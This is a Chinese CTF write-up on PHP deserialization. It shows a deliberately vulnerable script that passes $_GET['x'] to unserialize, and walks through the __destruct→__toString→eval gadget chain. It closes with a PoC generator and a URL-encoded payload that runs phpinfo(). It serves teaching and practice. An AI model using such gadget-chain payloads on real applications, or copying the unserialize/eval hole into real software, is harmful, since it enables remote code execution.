PHP反序列化的两道题
easy_unserialize
详细wp在我的另一篇博客里讲解的很详细了
http://codeqi.top/2018/05/19/MiniLCTF-Writeup/
练习2
题目:
<?php
class test1
{
public $varr;
function __construct()
{
$this->varr = "index.php";
}
function __destruct()
{
if(file_exists($this->varr)){
echo "<br />文件".$this->varr."存在<br />";
}
}
}
class test2
{
public $varr;
public $obj;
function __construct()
{
$this->varr='123456';
$this->obj=null;
}
function __toString()
{
$this->obj->execute();
return $this->varr;
}
function __destruct()
{
echo "<br />这是f2的析构函数<br />";
}
}
class test3
{
public $varr;
function execute()
{
eval($this->varr);
}
function __destruct()
{
echo "<br />这是f3的析构函数<br />";
}
}
if (isset($_GET['x'])) {
unserialize($_GET['x']);
}
?>
test1类中有一个echo,可以利用它来echo一个test2类的实例,从而调用test2类中的__toString()魔法函数
__toString()中调用了test3类中的execute()函数
execute()函数执行了eval()函数,可以执行命令
poc
<?php
class test1
{
public $varr;
function __construct()
{
$this->varr = new test2();
}
}
class test2
{
public $varr;
public $obj;
function __construct()
{
$this->varr='123456';
$this->obj=new test3();
}
}
class test3
{
public $varr;
public function __construct()
{
$this->varr = 'phpinfo();';
}
}
$a = new test1();
echo urlencode(serialize($a));
?>
运行得到
O%3A5%3A%22test1%22%3A1%3A%7Bs%3A4%3A%22varr%22%3BO%3A5%3A%22test2%22%3A2%3A%7Bs%3A4%3A%22varr%22%3Bs%3A6%3A%22123456%22%3Bs%3A3%3A%22obj%22%3BO%3A5%3A%22test3%22%3A1%3A%7Bs%3A4%3A%22varr%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D%7D
payload
x=O%3A5%3A%22test1%22%3A1%3A%7Bs%3A4%3A%22varr%22%3BO%3A5%3A%22test2%22%3A2%3A%7Bs%3A4%3A%22varr%22%3Bs%3A6%3A%22123456%22%3Bs%3A3%3A%22obj%22%3BO%3A5%3A%22test3%22%3A1%3A%7Bs%3A4%3A%22varr%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D%7D%7D
